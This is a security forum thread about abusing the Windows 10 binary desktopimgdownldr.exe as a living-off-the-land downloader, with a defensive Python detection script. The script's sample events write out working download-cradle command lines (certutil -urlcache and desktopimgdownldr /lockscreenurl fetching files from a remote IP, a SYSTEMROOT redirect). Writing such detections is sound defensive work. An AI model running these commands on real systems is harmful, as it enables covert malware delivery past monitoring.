Windows 10 background image tool can be abused to download malware

CyberTech

Nov 10, 2017
A binary in Windows 10 responsible for setting an image for the desktop and lock screen can help attackers download malware on a compromised system without raising the alarm.
Known as living-off-the-land binaries (LoLBins), these files come with the operating system and have a legitimate purpose. Attackers of all colors are abusing them in post-exploitation phases to hide malicious activity.

The new LoL in the Bin
An attacker can use LoLBins to download and install malware, bypass security controls such as UAC or WDAC. Typically, the attack involves fileless malware and reputable cloud services.

 

silversurfer

Aug 17, 2014
Executive Summary
  • Security professionals care about uncovering LOLBins; we found a new one that can be used to download arbitrary files as an alternative to certutil.
  • It can be run by standard users on most versions of Windows 10 used in the enterprise.
  • EDR practitioners should update their queries and watchlists to treat desktopimgdownldr.exe (new LOLBin binary) like certutil.exe.
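A concrete way to act on that last bullet is a process-creation rule that treats both binaries as download cradles. The script below is an added example written for this thread, not code from the quoted report or from any EDR vendor. It scans constructed Sysmon/4688-style events (the sample events, hostnames and IPs are made up) and flags certutil.exe or desktopimgdownldr.exe when a remote URL or a download switch appears on the command line, escalating when desktopimgdownldr.exe is spawned by a shell or its parent overrides SYSTEMROOT. The `/lockscreenurl:` switch, the SYSTEMROOT-redirect check and the parent-process heuristic are assumptions about the technique that the thread itself does not spell out.

```python
"""Flag certutil.exe / desktopimgdownldr.exe used as download cradles.

Added example for this thread; the event format is a simplified stand-in
for Sysmon EventID 1 or Windows 4688 process-creation records.
"""
import re
from dataclasses import dataclass

# The two download-capable LOLBins the thread names.
DOWNLOAD_LOLBINS = {"certutil.exe", "desktopimgdownldr.exe"}

# Switches that turn each binary into a downloader. The desktopimgdownldr
# switch is an assumption about its syntax; the thread quotes no command line.
CRADLE_SWITCHES = {
    "certutil.exe": (re.compile(r"-urlcache", re.I), re.compile(r"-split", re.I)),
    "desktopimgdownldr.exe": (re.compile(r"/lockscreenurl:", re.I),),
}
URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.I)
# Assumption: a parent cmd/powershell/script host redirecting SYSTEMROOT is
# how a standard user points desktopimgdownldr at a writable directory.
SYSTEMROOT_RE = re.compile(r"\bSYSTEMROOT\s*=", re.I)
# Assumption: desktopimgdownldr.exe is not normally launched by these hosts.
SHELL_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                 "cscript.exe", "mshta.exe", "winword.exe", "excel.exe"}

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # benign: hashing a file, no download behaviour
        "image": r"C:\Windows\System32\certutil.exe",
        "parent": r"C:\Windows\System32\cmd.exe",
        "cmdline": r"certutil.exe -hashfile C:\tools\x.exe SHA256",
        "parent_cmdline": r'cmd.exe /c certutil.exe -hashfile C:\tools\x.exe SHA256',
    },
    {   # desktopimgdownldr abused as a cradle from a shell with SYSTEMROOT redirected
        "image": r"C:\Windows\System32\desktopimgdownldr.exe",
        "parent": r"C:\Windows\System32\cmd.exe",
        "cmdline": r"desktopimgdownldr.exe /lockscreenurl:http://203.0.113.10:8080/update.bin /eventName:desktopimgdownldr",
        "parent_cmdline": r'cmd.exe /c set "SYSTEMROOT=C:\Windows\Temp" && desktopimgdownldr.exe /lockscreenurl:http://203.0.113.10:8080/update.bin /eventName:desktopimgdownldr',
    },
    {   # classic certutil download
        "image": r"C:\Windows\System32\certutil.exe",
        "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.10/a.txt a.txt",
        "parent_cmdline": r"powershell.exe -nop -w hidden",
    },
    {   # unrelated process, ignored
        "image": r"C:\Windows\System32\notepad.exe",
        "parent": r"C:\Windows\explorer.exe",
        "cmdline": r"notepad.exe C:\Users\alice\notes.txt",
        "parent_cmdline": r"explorer.exe",
    },
]


@dataclass
class Finding:
    image: str
    severity: str
    reasons: list
    urls: list


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict):
    """Return a Finding for a download-cradle event, else None."""
    name = basename(event["image"])
    if name not in DOWNLOAD_LOLBINS:
        return None
    cmd = event.get("cmdline", "")
    urls = URL_RE.findall(cmd)
    has_switch = any(p.search(cmd) for p in CRADLE_SWITCHES[name])
    if not (urls or has_switch):
        return None  # e.g. certutil -hashfile: legitimate, no download
    reasons = []
    if urls:
        reasons.append("remote URL in command line")
    if has_switch:
        reasons.append("download switch present")
    parent = basename(event.get("parent", ""))
    if name == "desktopimgdownldr.exe" and parent in SHELL_PARENTS:
        reasons.append(f"spawned by {parent}")
    if SYSTEMROOT_RE.search(event.get("parent_cmdline", "")):
        reasons.append("SYSTEMROOT redirected by parent")
    severity = "high" if len(reasons) >= 3 else "medium"
    return Finding(image=name, severity=severity, reasons=reasons, urls=urls)


def scan(events):
    """Evaluate every event and keep only the findings."""
    return [f for f in (evaluate(e) for e in events) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.image}: {'; '.join(f.reasons)} urls={f.urls}")
```

Run against the constructed events, the hashfile and notepad records produce nothing, the desktopimgdownldr record is rated high on four signals, and the certutil download is rated medium on the URL and switch alone. The same shape (binary name, switch, URL, parent, parent command line) maps directly onto a Sysmon or EDR query, which is the watchlist update the summary asks for.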
 

jogs

Nov 19, 2012
Is there anything in Windows that can't be abused!
I think every program can be abused; no matter how much a program is updated and patched, there will always be a way to hack it.
It's also true for hardware: whatever protection the vendor makes, there will always be someone who will be able to crack that protection.
 